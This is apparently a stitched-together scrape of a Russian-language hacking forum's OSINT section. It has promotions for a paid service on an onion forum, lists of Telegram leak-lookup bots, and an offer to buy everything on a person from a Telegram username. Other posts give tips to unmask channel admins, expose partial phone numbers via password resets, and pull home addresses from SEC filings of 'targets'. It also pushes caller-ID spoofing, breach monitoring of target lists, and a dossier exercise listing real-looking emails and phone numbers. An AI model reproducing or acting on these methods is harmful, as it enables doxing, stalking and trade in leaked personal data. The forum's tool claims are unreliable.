Усиленный Анализ Больших Данных через Искусственный Интеллект
С развитием искусственного интеллекта (ИИ) анализ больших данных в контексте конкурентной разведки переходит на новый уровень. ИИ предоставляет возможности для обработки и анализа огромных объемов данных с эффективностью, недостижимой для человеческого аналитика. Это включает в себя всесторонний анализ текстовых документов, финансовых отчетов, отзывов пользователей и многих других источников данных. Особенностью ИИ является его способность выявлять сложные закономерности и тенденции, которые могут оставаться незамеченными при традиционных методах анализа. Использование алгоритмов машинного обучения в конкурентной разведке позволяет предсказывать будущие тенденции рынка и потенциальные действия конкурентов. Эти алгоритмы анализируют исторические данные и текущие рыночные сигналы, предоставляя компаниям стратегические инсайты, необходимые для принятия обоснованных решений. Применение ИИ значительно сокращает время, требуемое для анализа данных, автоматизируя и ускоряя многие процессы. Это позволяет компаниям оперативно реагировать на изменения в рыночной среде и принимать взвешенные решения. ИИ обеспечивает гибкость в адаптации анализа под уникальные задачи и цели каждой компании. Учитывая специфику деятельности и рыночные особенности, ИИ может быть настроен для обработки данных в соответствии с конкретными потребностями бизнеса. Это ведет к формированию более точной и эффективной конкурентной стратегии, основанной на глубоком и многофакторном анализе.
В заключение хотелось бы отметить, что в современном мире информация является одним из самых ценных активов. Данные, касающиеся технологий, стратегий развития, финансовой информации и других аспектов корпоративной деятельности, обладают огромной ценностью. Компании-конкуренты, осознавая эту ценность, готовы платить десятки миллионов за доступ к этим данным. Хотел бы обратить ваше внимание на официальный сервис автора:
http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/77632/#post-558044
Приношу извинения администрации форума за ненавязчивую рекламу. Если у вас возникнут вопросы или комментарии, пожалуйста, напишите мне в PM.
С уважением Benjamin Graham.
Привет друзья, нашел сайт где есть отличные материалы про операционные системы, программирование, безопасность и многое другое, думаю вам понравится.
Link: https://doc.lagout.org/
Он называется Access geospy.ai - вы загружаете фотографию, он анализирует ее
за несколько секунд и выдает результатыНа сайте вы размещаете фотографию, а ИИ
находит местоположение и координаты этой фотографии
Он работает аналогично обратному поиску Google Lens, но отражает координаты
и другие данные
Сайт не требует регистрации, вы просто загружаете фотографию, он анализирует
ее и выдает приблизительные координаты и местоположение.
AI powered geo-location. Uncover the location photos were taken from by harnessing the power of ai
geospy.ai
Кто сталкивался?
Насколько открытые данные и как получить детальный доступ? Как я понимаю, это
платные истории.
На каком языке работают?
Может есть по ним что-то типа СПАРКа.
Требуется понять какие компании и какая недвижимость на людях.
Buying all infos from a person, I only know telegram username)
Paying up to 500$, depends info.
PM.
Do you know a tool doing the same thing as <https://github.com/woj- ciech/LeakLooker> but with no API needed?
](https://start.me/p/1kJKR9/commandergirl-s-suggestions)
A startpage with online resources about commandergirl's suggestions, created by commandergirl.
start.me
You must have at least 1 message(s) to view the content.
Ребят я уже устал от txt файлов, подскажите пожалуйста как можно оформлять красиво и без колхоза цифровое досье
Пробью любую контору по DNB, пишите название - помогу чем смогу)
Browser-Bruter это первый автоматизированный инструмент веб-тестирования на основе браузера, предназначенный для фаззинга веб-форм путем самостоятельного управления браузером. Он автоматизирует процесс отправки полезных данных в поля ввода браузера и отправляет их на сервер. Он полностью исключает необходимость взлома шифрования для фаззинга и вставки полезных данных в сканер и злоумышленник BurpSuite. После фаззинга создается подробный отчет, включающий все данные и результаты пентеста, а также HTTP- трафик.
fuzzing automation tool designed for web security professionals and penetration testers. This Python-based tool leverages Selenium and Selenium- Wire to automate web form fuzzing, ](https://github.com/netsquare/BrowserBruter)
BrowserBruter is a powerful web form fuzzing automation tool designed for web security professionals and penetration testers. This Python-based tool leverages Selenium and Selenium-Wire to automate...
github.com
Помогите или подскажите ботов или что то на подобии этого, чтобы узнать админа тг канал (Подписчики скрыт)
Open Source Intelligence (OSINT) tools have become increasingly significant for those working in cybersecurity, research, and investigative fields. The OSINT Telegram bot offers users the ability to quickly gather and analyze publicly available data, including leaks, logs, and more, all while emphasizing the responsible use of such information. The bot includes a one- week free trial, allowing new users to explore its capabilities through unlimited searches.
Exploring Public and Private Data
The OSINT bot aggregates data from a wide range of sources, offering users
access to information that may include public logs, historical data, and even
potentially sensitive leaks from open databases. While this capability can be
incredibly valuable for research, auditing, and threat intelligence, users
must tread carefully to avoid any unethical or illegal activities.
Legal and Ethical Responsibility
Handling data responsibly is a must when using any OSINT tool. Gaining
unauthorized access, sharing private data, or exploiting sensitive leaks is
illegal in many jurisdictions and goes against ethical guidelines. The OSINT
Telegram bot’s primary intention is to serve as a tool for professionals
engaged in security research, awareness, and lawful investigations.
How to Use the OSINT Bot Effectively
Get Started Today
Discover how OSINT can empower your research and data exploration needs. The
OSINT Telegram bot offers a one-week free trial of unlimited searches,
providing an opportunity to understand its potential while adhering to ethical
and legal practices.
Join the OSINT Telegram Bot to start your free trial and responsibly harness the power of open data.
Форумы,подкасты,тренинги,блоги и тд, наслаждайтесь https://start.me/p/DPYPMz/the-ultimate-osint-collection
Just discovered this tool: http://urlxray.com/
Cool if you don't want to click!
Allows you to listen to radio stations around the world=> useful during OSINT research in specific regions...
Для кого-то может быть полезным
В Twitter @cyb_detective был опубликован курс "PYTHON FOR OSINT. 21 DAY COURSE
FOR BEGINNERS". Mатериал позволит автоматизировать различные рутинные задачи,
связанные с исследованиями: сбор данных с веб-сайтов, сбор результатов поиска,
работа с интернет-архивами, создание отчетов и визуализация данных.
Основная цель курса — не научить тебя писать код на Python, а научить тратить меньше времени на рутинные задачи OSINT. Итак, в дополнение к примерам кода, автор делится ссылками на различные сервисы, которые помогут решить различные задачи.
Этот курс также будет полезен тем, кто далек от программирования и хочет немного повысить свой технический уровень, попробовать использовать Linux, научиться работать с командной строкой и понимать, что такое "JSON", "API", "WHOIS" и т.д.
Spoiler: spoiler
Содержание курса:
- Day 0. Preparing for work;
- Day 1. Run the first script;
- Day 2. Minimum Basic Syntax;
- Day 3. Install and run Python command line tools;
- Day 4. Reading and writing files;
- Day 5. Handling HTTP requests and working with APIs;
- Day 6. JSON;
- Day 7. CSV;
- Day 8. Databases;
- Day 9. Automate the collection of search results;
- Day 10. Scraping;
- Day 11. Regular expressions;
- Day 12. Proxies;
- Day 13. Functions for working with lists;
- Day 14. Working with the file system;
- Day 15. Domain information gathering;
- Day 16. List mapping and functions for work with strings;
- Day 17. Generating documents;
- Day 18. Generating charts and maps;
- Day 19. Wayback Machine and time/date functions;
- Day 20. Web apps creation;
- Day 21. Tools to help you work with code.
• Описание курса:
Code:Copy to clipboard
https://github.com/cipher387/python-for-OSINT-21-days
• Прямая ссылка на загрузку курса в pdf:
Code:Copy to clipboard
https://github.com/cipher387/python-for-OSINT-21-days/raw/main/Python%20for%20OSINT.%2021%20day%20course%20for%20beginners.pdf
Функции
Осинт
Поиск по электронной почте
Поиск IP
Поиск по базе данных
Inteligence X
Списки IoC ниже.
- Whois(IP,Домен)
- IP-адрес (IPv4, IPv6)
- АСН
- Доменное имя
- URL-адрес
- Уязвимость (номер CVE)
- Хэш
- Социальные сети (Аккаунты, Временная шкала)
Режимы поиска:
-Выбрать URL: выберите изображение на странице и выполните поиск по URL-адресу изображения. Это режим поиска по умолчанию.
-Выбрать изображение: выберите изображение на странице и выполните поиск по файлу изображения. Этот режим поиска предпочтителен для сайтов, которые не допускают прямых ссылок на изображения, например частных сайтов.
-Захват: поиск по захваченной области страницы.
-Обзор: поиск по изображению с вашего устройства. Вставка изображений из буфера обмена также поддерживается на настольных платформах.
-URL: поиск по URL-адресу изображения.
Боты
1. Глаз бога
2. Helper inform bot
3. Dataisbot
4. GTA (Global Tech Aggregator)
5. Holehe (Проверка почты, но советую
использовать репозиторый из гитхаб,
версия для мальтего)
6. Userbox
7. Проверка ip адреса по нику майнкрафт
8. Universal Search
9. Scorpion (очень советую, на данный
момент проект полностью бесплатен, и доступно в нем более 600 баз)
10. Maigret (Проверка по никнейму)
11. Telesint
12. Funstat
13. Himera
14. LeakOsint (тоже достаточно большое кол-во
баз, при первом запуске дается пробная неделя)
15. Vkhistory
16. Dataleakbot
17. VkuserInfo
18. Mailcat
19. Sova
20. Infaslbbot (В день доступно 3 запроса,
работает онли по номеру)
21. Бот ПоискЧата
22. Архангел
23. AVinfobot (Пробив по номеру телефонному
номеру, или номеру машины)
24. DetectaBot
25. Zerneda
Сайты
1. 0tRocks
2. Idinfo
3. [Посмотреть регион по телефону](https://fincalculator.ru/telefon/region-
po-nomeru)
4. Odyssey search
5. SaveRuData
6. Intelx
7. HLR запрос (покажет в сети ли номер)
8. X-ray
Great tool for creating non-existent people (sockpuppets). AI was trained using a database of 70,000 of photos of real humans. Cool service because it often makes very emotional and lively faces.
Sterra's main function is to export lists of followers | following | mutuals from Instagram to excel | csv | json with informations on accounts.
Instagram OSINT tool to export and analyse followers | following with their details - novitae/sterraxcyl
github.com
So I try RelateList a week ago for an investigation and it's really great and
accurate with their results.
Maybe don´t show you the same detailed analysis than other search engines for
corporations, but if you want something, let's say, tactical, then you will
find it really useful, specially when you want to find relations between corps
in a very direct way.
Some of you guys already try it?
What do you think about it?
related resources. (All Free & Actionable) ](https://github.com/Ph055a/OSINT_Collection)
Maintained collection of OSINT related resources. (All Free & Actionable) - Ph055a/OSINT_Collection
github.com
ресурсов для тех, кто проводит OSINT-расследования. Ни одна из ссылок ниже не должна указывать на платное программное обеспечение или услуги, они предназначены для реальных OSINT-расследований. Если вы обнаружите какие-либо ссылки, которые не содержат действенной информации, удалите их и зафиксируйте.
венатор это браузер созданный специально для целей OSINT. он содержит множество функций, сайтов и инструментов. к тому же создатели заботятся о безопасности пользователей.
ссылка на скачивание: https://venator.cyberyozh.com/download
Open Source Only!
Android
1. F-Droid — всем известный каталог FOSS приложений;
2. Aurora Store — неофициальный FOSS аналог Google Play с фокусом на приватность и дизайн;
3. Accrescent — еще один альтернативный магазин приложений на Android;
All the rest
1. Оsssoftware — каталог open-source альтернатив популярным продуктам;
2. Alternative To — сайт, где вы можете найти безопасную альтернативу любому приложению или софту;
3. Degoogle — внушительный список всевозможных альтернатив приложениям Google;
4. Privacy Redirect — расширение, которое которое перенаправляет запросы к Twitter, YouTube, Instagram & Google Maps на альтернативные сервисы, дружелюбные к приватности:
5. No More Google — авторский список альтернатив Google сервисам с приятным интерфейсом и действительно достойными приложениями/cофтом.
Leakix — «хакерский поисковик», который сканит подсети и выводит результаты на основе полученных данных.
По сути, это еще один аналог Shodan, Zoomeye и Сensys. Раньше существовал на донаты и был бесплатным.
Сейчас же бесплатно можно поучить 25 страниц результатов, осуществить 3000 API запросов и выдача результатов будет с 15-и дневной задержкой.
К слову, по прайсу, условиям и самим наличием бесплатного пакета, Leakix
существенно обходит Shodan и Censys.
SquareX — сервис, который обеспечивает безопасность
доступа к сомнительным сайтам или файлам.
Использует уникальный метод облачных песочниц. После использования среду можно утилизировать, удалив все данные сеанса.
Используем приложения с открытым исходным кодом.
Exodus Privacy — платформа для
анализа Android приложений на предмет приватности.
Отражает актуальные рекламные и не только трекеры, а так же разрешения, которые требует приложение.
К слову, на сайте есть база из 432 актуальных трекеров.
lite.kamerka.io
@usersbox_system_bot
@overload_robot
@BlackatSearchBotBot
@QuickLeaksBot
@AngelSearcherBot
@US2LeakOSINTbot
@SearchforinformationnBot
@telesint_bot
@TeleScans_Bot
@TgAnalyst_bot
@ibhld_bot
@Zernerda1bot
@iscerberusbot
@AngelSearcherBot
@InfoVkUser_bot
@friendly_graph_bot
@InfoVkUser_bot
@mailcat_s_bot
@holehe_s_bot
@getphonename_bot
@Search_HimeraBot
An OSINT search engine that allows you to perform an email or a phone reverse lookup, find related google reviews, and many other things.
![epieos.com](/proxy.php?image=https%3A%2F%2Fepieos.com%2Fapple-touch- icon.png&hash=29a9744e05e97c3c016982bd9e774baa&return_error=1) epieos.com
poiski.pro
rupoisk.pro
Search pattern generation tool
seintpl.github.io
Track your OSINT investigations
www.osintracker.com
](https://cse.google.com/cse?cx=f4046a4505f1e4b48)
cse.google.com
![lyzem.com](/proxy.php?image=https%3A%2F%2Flyzem.com%2Fandroid- chrome-48x48.png&hash=b10f1f7cc523498175f1b80e8d723f97&return_error=1) lyzem.com
![kribrum.io](/proxy.php?image=https%3A%2F%2Fkribrum.io%2Fimg%2Ficons%2Fandroid- chrome-192x192.png&hash=4b8f7ac7b698da601a4af2177a04417b&return_error=1) kribrum.io
drozer - это фреймворк для тестирования безопасности для Android.
drozer позволяет искать уязвимости в приложениях и устройствах, принимая на себя роль приложения и взаимодействуя с Android Runtime, конечными точками IPC других приложений и базовой ОС.
drozer предоставляет инструменты для использования, обмена и понимания публичных эксплойтов для Android.
Framework for Android. ](https://github.com/WithSecureLabs/drozer)
The Leading Security Assessment Framework for Android. - WithSecureLabs/drozer
github.com
www.mapchannels.com
Anyone have good dorks for Atlassian token discovery? All of mine have been shit, so any further insights is nice
Существует множество методов поиска номера телефона человека. Один из самых
нетривиальных из них - способ восстановления.
В каждом ресурсе где есть регистрация - присутствует и возможность "вспомнить"
пароль, при этом раскрывается часть зарегистрированного номера телефона.
То есть, если Вам известна учётная запись пользователя на одном из сервисов, а также email, Вы можете установить часть номера телефона. Фишка в том, что в разных ресурсах раскрываются разные части номера.
getfb_bot is not working ,does anyone know how it worked,getting fb id using phone number
Just tried this nreally cool OSINT engine: synapsint.com
Please leave a like if you liked it
Приветствую,
Парни подскажите ресурсы или решения для задачи нахождения и построения
возможных взаимосвязей между кошельками из своего списка.
База данных Эдгара SEC обеспечивает свободный публичный доступ ко всем документам, связанным с инсайдерской покупкой и продажей акций в США . Ряд веб-сайтов с финансовой информацией предлагают более простые в использовании базы данных инсайдерских покупок.
![](/proxy.php?image=https%3A%2F%2Fwww.tradingreviewers.com%2Fwp- content%2Fuploads%2F2020%2F05%2Finsider- trades.jpg&hash=9b9035cf6afd1f65ad08ef11b857412c)
Среди них - https://finviz.com/insidertrading.ashx
Cреди инсайдерских сделок на рынке акций США, удобно находить жирные
персональные таргеты для отработок (например в Linkedin ) либо юзать под сбор
инфы для Osint .
В таблице имеется интересная колонка SEC Form 4 ,перейдя по ссылке которой ,в
большом кол-ве случаев можно раздобыть адрес лица ,которое подавало форму в
SEС!
Инструмент OSINT для получения информации из профиля Github или Gitlab и поиска адресов электронной почты пользователей, утекших в коммиты.
Github and Gitlab profile and find user's email addresses leaked on commits. ](https://github.com/GONZOsint/gitrecon)
OSINT tool to get information from a Github and Gitlab profile and find user's email addresses leaked on commits. - GONZOsint/gitrecon
github.com
Does anybody have a list of essential APIs that everyone should setup, free or paid?
Or another software entirely if there is something better out there. I will appreciate any input
https://github.com/bellingcat/telegram-phone-number-checker - Простой скрипт позволяет проверить, подключен ли конкретный номер телефона к учетной записи Telegram, а также возвращает имя пользователя и прочую информацию в случае успеха.
Привет всем, я нашел 2 отличных инструмента, надеюсь, они вам понравятся:
**
https://www.spoofcard.com/: SpoofCard дает вам возможность звонить и писать
с виртуального номера, чтобы защитить вашу личную информацию и
конфиденциальность. Вы можете использовать столько номеров, сколько вам нужно.
Программа проста в использовании и работает на любом телефоне. Вы также можете
изменить свой голос.
https://voipsv.com/ : аналогична предыдущей, но более простая и дешевая.**
Искал я открытые базы данных и нарыл штук 20. Всё сливать слишком жалко, но немного оставлю :
](https://reestr-ta.ru/)
![reestr-ta.ru](/proxy.php?image=https%3A%2F%2Freestr- ta.ru%2F&hash=d9362931b41da883ce361978c64e104c&return_error=1) reestr-ta.ru
akkred.uz
](https://www.advokatymoscow.ru/reestr/members/?s=name&o=asc)
www.advokatymoscow.ru
Насколько знаю, ранее нигде не упоминались и никому известны как инструменты для поиска информации не были.
Вопрос: существуют ли какие-то сервисы(WEB или скрипты), которые позволяют по
номеру телефона посмотреть в каких банках к этому номеру привязан счет(т.е.
эксплуатируют СБП)?
П.С. Вариант: поставь приложение Тинькофф(или другого банка) и попробуй
перевести рубль по СБП, не интересен.
Извлечение метаданых :
This online metadata viewer will show you all hidden metadata info of audio, video, document, ebook & image files.
www.metadata2go.com
Free online tool to view metadata from files of arbitrary type.
www.extractmetadata.com
http://exif.regex.info/exif.cgi
Сведения о компаниях :
](https://opencorporates.com)
Free and Open Company Data on 210 million companies and corporations in over 130 jurisdictions, including US, UK, Switzerland, Panama...
opencorporates.com
to business! ](http://www.europages.com/)
More than a simple directory, Europages, the directory of European companies is a professional portal that encourages business-to-business exchanges. Europages is the business directory leader!
www.europages.com
Auf wlw Händler, Hersteller & Lieferanten finden ✓ 590.000 B2B-Anbieter ✓ Einkäufer-Registrierung ✓ Firmenprofil erstellen ✓ Suche beauftragen ✓
![www.wlw.de](/proxy.php?image=https%3A%2F%2Fd18yn9dcojt05d.cloudfront.net%2Fapps%2Fvisable%2Fcompany_profile%2Ffrontend%2Fimg%2Fandroid- chrome-192x192.7271c61.png&hash=15ef24b80c1eec64d93fef711f27a288&return_error=1) www.wlw.de
Список СМИ :
The homepage for news addicts
www.allyoucanread.com
Архивы фото в СМИ :
AP Images is the essential source of editorial and creative photos and images for professional image buyers
www.apimages.com
pictures.reuters.com
[ https://www.news-press.com/media/latest/news ](https://www.news- press.com/media/latest/news)
IMINT :
![www.diffchecker.com](/proxy.php?image=https%3A%2F%2Fwww.diffchecker.com%2Fstatic%2Fimages%2Ffb- image.png&hash=7e401942bbb30cc4a799d1efa36e27be&return_error=1)
Compare the difference between pictures or other images! Enter two images and the difference will show up below.
www.diffchecker.com
](https://letsenhance.io/)
AI software to enhance and upscale pictures. Increase resolution and quality. Fix blurry, pixelated and bad images. Make every photo sharp and clear.
letsenhance.io
Free online tool to enlarge small images without artifacts. Supports six different high-quality interpolation algorithms.
www.imageenlarger.com
VI :
Action Reporter Tool | Amnesty International USA
Сайты для проверки фейковых новостей :
Seeking truth, exposing fiction
![www.truthorfiction.com](/proxy.php?image=https%3A%2F%2Fdn.truthorfiction.com%2Fwp- content%2Fuploads%2F2018%2F10%2F26055010%2Fcropped-tof- favicon-32x32.png&hash=cd836b617288d43a17cf7d1991b286b4&return_error=1) www.truthorfiction.com
checking)
The Reporters’ Lab maintains a database of global fact-checking sites. You can use the map to explore sites around the world or use the menu below. (Here’s more how we identify fact-checkers.)
![reporterslab.org](/proxy.php?image=https%3A%2F%2Freporterslab.org%2Fwp- content%2Fthemes%2Freporters%2Fassets%2Fimg%2Ffavicon-192x192.png&hash=f3d5edb82d5fe4a621d13ed6d4de7b03&return_error=1) reporterslab.org
Visualize the spread of information on Twitter.
hoaxy.iuni.iu.edu
![www.snopes.com](/proxy.php?image=https%3A%2F%2Fwww.snopes.com%2Ftachyon%2F2019%2F11%2F2019-snopes- open-graph-default.png&hash=5e9a7862970ff1173addeb10cba91783&return_error=1)
The definitive Internet reference source for urban legends, folklore, myths, rumors, and misinformation.
www.snopes.com
Национальные поисковые системы :
https://www.search.ch/ - Швейцария
http://www.alleba.com/ - Филиппины
https://www.so.com/ - Китай
https://www.eniro.se/ - Швеция
https://www.zapmeta.fi - Финляндия
https://www.walla.co.il/ - Израиль
http://www.zoeken.nl/ - Нидерланды
https://www.daum.net/ - Южная Корея
http://www.aonde.com/ - Бразилия
Это конечно лишь малая часть от возможностей, возможно, буду за плату распространять дополненную версию.
As a security researcher, my investigation into Netsparker has unearthed concerning findings regarding their presence within payloads. Specifically, I've identified instances where their name is embedded within payloads, such as "ns:expression(netsparker)" and "ns:netsparker056650=vuln ". Utilizing Google Dork, I've discovered that numerous .gov websites and universities unwittingly store these payloads. Screenshots corroborate this, exemplified by governmental domains and educational institutions.
Moreover, Netsparker-sponsored articles acknowledge the pervasive issue of sensitive data exposure, seemingly downplaying its severity. This laissez- faire attitude raises concerns regarding compliance with GDPR regulations. Should any entity incur damages due to Netsparker's activities, legal ramifications may ensue.
Netsparker's pervasive footprint is evident from the screenshots provided, indicating a widespread presence across various platforms. The payload "body{x:expression(netsparker " serves as a significant proof of concept (POC), underscoring the breadth of Netsparker-related payloads.
Additionally, based on this research, it's crucial to note that anyone, including website owners or external parties, can potentially find government and university websites that Netsparker has scanned, as the tool leaves footholds. Through Google Dorking, individuals can readily identify these scanned websites if they are available for public access.
To mitigate such risks, I seek alternative tools with robust operational security (OPSEC) measures, ensuring they don't inadvertently disclose their identity within payloads. It's imperative to steer clear of solutions that leave such identifiable markers.
Всё в прикреплённом файле.
Это дополненный список, относительно того, что я выложил в телеграм, но не
полный, относительно всего моего инструментария.
Неизвестные открытые реестры :
1)https://national-reestr.ru/
2)reestr.digital.gov.ru/
3)https://national-reestr.ru/
4)https://reestr-minsvyaz.ru/
5)http://www.eaeunion.org/#services
6)https://transport.mos.ru/gruzoviki/reestr
7)reestr.rgr.ru
8)http://rosvois.ru/reestr/
9)https://rating-reestr.ru/
10)https://reestr.tpprf.ru/
11)https://akkred.uz/reestr
12)<http://fas.gov.ru/pages/activity/tariffregulation/reestr-subektov-
estestvennyix-monopolij.html>
13)https://erdc.ru/upload/reestr-tor.pdf
14)https://reestr-is.lenobl.ru/registry/public/systems/list
15)https://www.advokatymoscow.ru/reestr/members/?s=name&o=asc
16)https://udmedu.ru/nepr_deyat/health/reestr.php
17)https://promtorg.volgograd.ru/current-activity/services/list/reestr/
18)https://reestr-ta.ru/?p=2
19)[https://obrnadzor.gov.ru/gosudarstv...telnoj-deyatelnosti/svodnyj-reestr-
liczenzij/](https://obrnadzor.gov.ru/gosudarstvennye-uslugi-i-
funkczii/gosudarstvennye-uslugi/liczenzirovanie-obrazovatelnoj-
deyatelnosti/svodnyj-reestr-liczenzij/)
20)https://reestr-gis.gov.spb.ru/gis
22)http://sroroo.ru/about/reestr/
23)https://reestr.tourpom.ru/search.php
24)http://unro.minjust.ru/NKOPerfServ.aspx
25)https://reestr-gis.gov.spb.ru/gis
26)https://tourism.gov.ru/operators/
27)https://www.gosnadzor.ru/opendata/
28)https://www.gosnadzor.ru/service/list/reestr
SRO/
29)https://www.eapo.org/ru/?patents=reestr
30)https://lkexpertiza.spb.ru/Reestr/ReestrRazrVvod
31)https://clinline.ru/reestr-klinicheskih-issledovanij.html
32)https://auditor-sro.org/reestr
33)http://ntd.niitnn.ru/actual.aspx
34)https://egrp365.ru/reestr
35)https://reestr-neftegaz.ru/
36)https://egrz.ru/organisation/reestr/latest
37)https://favt.gov.ru/dejatelnost-aviakompanii-reestr/
38)https://www.reestr-sro.ru/
39)https://reestr.gossortrf.ru/
40)https://www.nopriz.ru/nreesters/elektronnyy-reestr/
I am looking about some page when I can get know, which sites are conected with e-mail adresses.
Setting up alerts -
De-hashed recently added breach monitoring system for completely free of
charge.
So go signup and create an account, now that you have created an account login
then go to monitor settings
(https://www.dehashed.com/monitor/manage/standard)
Create Notification Channel -
This is where it will send the breach notification to SMS / email
Select email and enter example@yopmail.com,
yopmail has a built in RSS feed that we will be using later
Create Monitor Tasks -
Here you get the choice of what data you wanted to be alerted about if it
shows up in a breach: etc username,email,phone number & name.
Fill out the targets info you want to be alerted about.
Getting altered on telegram -
Now go to the yopmail account and click the three buttons on the left
navigation bar.
You will see RSS feed so click it and copy the link to the RSS feed.
Next we will need to find a telegram RSS bot: https://telegram.me/rss2tg_bot
will work just fine or you can find a opensource one.
Then just open a PM with the bot and paste the yopmail link into the chat and
you will get notified when de-hashed have alerted you of a new breach.
Why would someone want to do this?
Well I have a large list of targets that I don't want to keep checking daily
and unlike HaveIBeenPwned this does not notify the user.
The majority of users also don't hoard databases like the rest of us so they
can still be altered then find that database that de-hashed got their sweaty
hands on.
The world’s most popular flight tracker. Track planes in real-time on our flight tracker map and get up-to-date flight status & airport information.
www.flightradar24.com
Track glider arround the world. Watch competitions in real time! Elevation graphs, task integration and much more!
glidertracker.org
Live aircraft tracking. Real-time flight status. Unfiltered global data. Airlines, private jets, and military.
globe.adsb.fi
](https://www.planemapper.com)
PlaneMapper is a real time plane and flight tracker providing up to date status of your flight, airport schedules, aircraft and airline database, industry related articles and news.
www.planemapper.com
](https://opensky-network.org)
![opensky-network.org](/proxy.php?image=https%3A%2F%2Fopensky- network.org%2Ftemplates%2Fosky3%2Ffavicon.ico&hash=4966b33453a6e5184dc56c032898f685&return_error=1) opensky-network.org
ADS-B Exchange - track aircraft live - aircraft flight history
![globe.adsbexchange.com](/proxy.php?image=https%3A%2F%2Fglobe.adsbexchange.com%2Fimages%2Fcropped- Stealth-1-32x32.png&hash=fbad64b54da6f7d6ed96e0f417aaa0fa&return_error=1) globe.adsbexchange.com
Real-time flight tracking with one of the best and most accurate ADS-B coverage worldwide. Check airport arrivals and departures status and aircraft history.
www.radarbox.com
Le meilleur outil de suivi des vols : Cartes de suivi en temps réel, statut des vols, et retards dans les aéroports pour les vols des compagnies aériennes, les vols privés et ceux de l'aviation générale, et aéroports.
flightaware.com
для людей в OSINT: каким образом вы можете удалять сообщения с обеих сторон в прямом сообщении Twitter?
Тренируем навык поиска главного и отсечения дезинформации.
Кейс, который позволяет тренировать важнейший навык в разведке.
Этим тестовым заданием со мной когда-то поделился человек, набирающий OSINT-
исследователей в команду.
К сожалению, контакт с ним утерян.( Если ты тот самый, из московского
детективного агентства - контакты в описании канала)
Скоро опубликую обширное решение, обозревайте :
Предистория: Система мониторинга получила данные почты и номера мобильных телефонов. Требуеться обнаружить личность за этой "горой" данных и идентифицировать её.
Цель: Составить досье на личность.
Входные данные:
email>>>
chuvachoksls@gmail.com
acja_1996@mail.ru
youdontwatchmebaby@protonmail.com
anastosiya_8901@mail.ru
wersank@yandex.ru
kluchnik2010@yandex.ru
tv.stefanova@abv.bg
chuzachoksis@gmail.com
79607422429@yandex.kz
notkidala@protonmail.ch
anna8080SARP@yandex.by
rockybalqboa@gmail.com
79607825421@bk.ru
lara672009@mail.ru
asja_travel@gmail.com
selfie-proof@yandex.ru
larammm777@gmail.com
founderdindu@yahoo.com
GOCSXXL@GMAIL.COM
cs-7RG@mail.ru
мобильные телефоны>>>
+79083010507
+79093426682
+380971367103
+380632248586
+79089052700
Источник :
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FqQezLbSF_FSZHXWI5kR9FzkCVUV5HOWASxEVBk_1mELjvpQrnvqFpeYF_W7n53mwKJ4mJnZqWAEIY8zWimlJ6vbLPVGWjTK6J88sr7IZIFUkGnMjcugx1UiExasnhVlfjMw558b-M836QT4piYbBRtOQxTYxJvS98dvTtYnp77SldZc4YEgX2NIiCZl- xPU5TYe9mWlxFK7gVCeE8v3_mu- XBGISxs93L7bE0Jsqt6j9PImceT4Loww8YCUaHbdKHMOvHfbNEooZm_J4ZtY4u2j0NRIK_LRlZlldNebNA9PUYIYKrGVT_RvB5AHPuGIg92mKQZidltduAQ0WKJZuwg.jpg&hash=0163b88e431b2d614579b5fe38308228&return_error=1)
Канал об инновациях и интересных методах в сфере разведки в интернете и OSINT. Наш чат - @DigitalScoutingChat Канал про HUMINT - @HUMINTSCOUT Владелец - @DigitaIScouter
t.me
Looking for bright OSIINTs
A bunch of predator police officers are working within Sussex Pol.
Attacking/Arresting hackers, that go against Putin.
They use Note 10 as a mobile device.
1.- Shodan: поисковая система для устройств, подключенных к Интернету.
2.- Censys: Платформа для поиска информации об устройствах и сервисах.
3.- Virus Total: проверка файлов и URL-адресов по различным базам данных
угроз.
4.- IPinfo: Предоставляет подробную информацию об IP-адресах, геолокации и др.
5.- URL.Void: Проверка репутации URL-адресов и доменов.
6.- ThreatCrowd: Агрегирует информацию из различных источников о доменах, IP-
адресах и хэшах.
7.- Alien Vault OIX: сообщество обмена информацией об угрозах.
8.- Hybrid Analysis: Анализ вредоносных программ по файлам и URL.
9.- ThreatConnect Free: Платформа для сбора и анализа угроз.
10.- RiskiQ Community Edition: Выявляет веб-угрозы, связанные с доменами.
11.- GreyNoise: выявление "шума" в Интернете, например, устройств сканирования
уязвимостей.
12.- Pulsedive: Агрегирует информацию из различных источников для анализа
угроз.
13.- Maltiverse: Агрегирует информацию из различных источников для
исследования угроз.
Gotta ask you guys, any cool OSINT tools for Twitter/ X after they changed their API? I haven't done OSINT on the platform lately so I have been a bit rusty. I remember that tools like TwitterFall , TweetMapper, birdhunt was also cool. Nevertheless, as I said, I am rusty, so I would appreciate if you share any cool tools for X. Thanks
Метод актуален в том случае, если у нас есть ссылка на приватный канал, в
который нет возможности вступить. Тогда единственное что у нас есть - это
предпросмотр в браузере.
Однако телеграм часто скрывает часть описания канала, которая может содержать
полезные сведения. То есть в предпросмотре вы будете видеть неполное описание
ресурса. Однако на самом деле БИО содержится полностью, но скрыто в коде
элемента. Чтобы его увидеть :
1. Нажмите правую кнопку мыши
2. Найдите элемент tgme_page_description . В зависимости от браузера он
находится в разных местах, раскрывайте различные куски кода, чтобы найти.
В Яндексе он находится здесь :
body > div.tgme_page_wrap > div.tgme_body_wrap > div >
div.tgme_page_description
3. Данный элемент содержит описание канала, однако полное, в отличие от
пользовательского варианта.
![t.me](/proxy.php?image=https%3A%2F%2Fcdn4.cdn- telegram.org%2Ffile%2FKGeb3Mwrsis5Rqo_snOBzYNCoxDj0RXNhQeokf5bN8DVVXJb1XlB6kS2-Hn- doy9lzsll84oDHVLRablL5tNSRT4Kcq_37E1hXFo3I8LtdmfTutuonudL0BPv07i-Uz1w5aDG-7hYDGwqUQ1ZRAXB07eRCWJZVKcgMPby2lreLjSDL1wrMeifXzOCYvoi81DyM0c9tvhZ08vr_- MQjyhbWIHVL2ai9yfxIOw0M2tdP1pCV0uYRkYrOcrEgUdHKp3J_ns1Tkm1Ij95HXt8zFbAM_Eh9oMAFWzwIOjs8IXf- mLZzAi50C7_TSVdctLgyqrvJz6lhTbq6sOeVq_dtrAZg.jpg&hash=f9d95ca943d832880eddbf094a113147&return_error=1)
👮♂️Администрация не призывает, а так же не несёт ответственности за ваши действия! Покупка подписки - @internetscandal
t.me
